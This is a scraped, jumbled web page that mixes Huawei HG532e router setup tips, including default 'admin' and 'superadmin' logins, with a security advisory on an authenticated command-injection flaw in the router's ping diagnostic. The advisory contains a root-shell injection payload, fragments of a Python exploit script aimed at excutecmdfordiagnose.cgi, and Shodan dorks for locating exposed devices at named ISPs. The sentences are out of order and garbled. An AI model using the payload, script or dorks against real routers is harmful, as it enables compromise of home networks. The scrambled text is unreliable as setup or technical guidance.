To continue, enter the code in both fields and press "Send".
#Huawei hg532e password
If you don't have a suitable password, please use our password generator. Think of a combination of 8-12 characters, preferably with numbers, letters, and punctuation marks. The login will be superadminand the password is During the initial setup, the system will ask for a new access password. Access data is the word admin.Īttention! In the case of modems, which appear in "Beltelecom", the data may be different. This will open a window to access the modem configuration web interface. Launch any Internet browser (even the built-in Internet Explorer and Microsoft Edge apps work) and type in the address bar 192.168.1.1.The configuration of the device in question for the operators of Russia, Belarus and Kazakhstan practically does not differ from the procedure in the previous article, but there may be some nuances, which we will discuss later. More in detail: Configuration of the Huawei HG532e in Ukrtelecom We have already reviewed the peculiarities of the configuration of this router for the Ukrtelecom operator, so if you use the services of this provider, the following instruction will help you to configure the device. For the same reason, there is almost no need to configure it: just enter a few contract parameters and the modem is ready to go. Most of the time, the router in question is distributed under the promotions of the large providers, so it is usually flashed for the networks of a certain Internet service provider. 1.1 Configuring the Internet connection.We accept no responsibility for any damage caused by the use or misuse of this information. The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. Most likely all HG532* models are vulnerable. Hardware version: HG532SAM1HG530ERRAMVER.B Hardware version: HG532EAM1HG530ERRAMVER.B An attacker is able to obtain a root shell on the device. This flaw may compromise the integrity of the system and/or expose sensitive information. Request_diagnose = s.post(url_diagnose, cookies=cookie, verify=False) Url_diagnose = url+'/html/management/excutecmdfordiagnose.cgi?cmd=127.0.0.1'+payload+'&RequestFile=/html/management/pingstatus.asp' Request_login = s.post(url_login, data=data, cookies=cookie, verify=False) Payload = urllib.quote_plus(' -c1 '+cmd+' > /var/pingres.txt #')ĭata = Password_base64 = base64.b64encode(hashlib.sha256(password.encode()).hexdigest()) Password_sha256 = hashlib.sha256(password.encode()).hexdigest() # shodan.io dork: "Content-Length: 10814" "no-cache" org:"Wind" # shodan.io dork: "Content-Length: 11881" "no-cache" org:"Cable & Wireless Panama" Note: it is necessary to redirect output to the file “/var/pingres.txt” in order to obtain a visible command injection, indeed the web application respond with that file (LOAD:00409B9C). The “#” allows to ignore the “-c 4 > /var/pingres.txt” which follows the format string placeholder (LOAD:00409B52). Then, there is a semicolon followed by “whoami”: that is the command that the attacker wants to execute. The first argument “127.0.0.1 -c 4” is to complete the ping command (not strictly necessary). Usually, the user set an IP/hostname in a web-form and he/she sees the output, but inserting a semicolon (or various injection characters) it is possible to execute others commands.įor example, a legit input may be: 127.0.0.1Ī malicious one may be: 127.0.0.1 -c 4 whoami > /var/pingres.txt # The vulnerability is the lack of input sanitization: the code does not check if the passed string is a valid IP and does not check the presence of dangerous characters. LOAD:00409B9C jalr $t9 ATP_WEB_SendFileĪs we can see, the web interface use “system” to execute PING command (LOAD:00409B84) and the command is built from the previous “snprintf” (LOAD:00409B6C) call. LOAD:00409B84 jalr $t9 system # call system with previous snprintf result LOAD:00409B6C jalr $t9 snprintf # call snprintf(ping %s., ) LOAD:00409B5C la $a2, aPingSC4VarPing # "ping %s -c 4 > /var/pingres.txt" Thanks to reverse engineering techniques we were able to identify the snippet of code that performs this action: The vulnerable function is used to check if a domain/IP is reachable. The router is affected by a “Command Injection” vulnerability located in the web-panel allowing an authenticated user to obtain a root access to the system. Shodan.io dork: “Content-Length: 10814” “no-cache” org:”Wind” The model HG532s is distributed in Italy since 2012 by Wind-Infostrada and it is still in use. Shodan.io dork: “Content-Length: 11881” “no-cache” org:”Cable & Wireless Panama”.
The model HG532e is used in Panama by “Cable & Wireless Panama”. Huawei HG532* are wireless home gateways for home or office ADSL. # Authors: Raffaele Forte, Andrea Ferraris
0 kommentar(er)
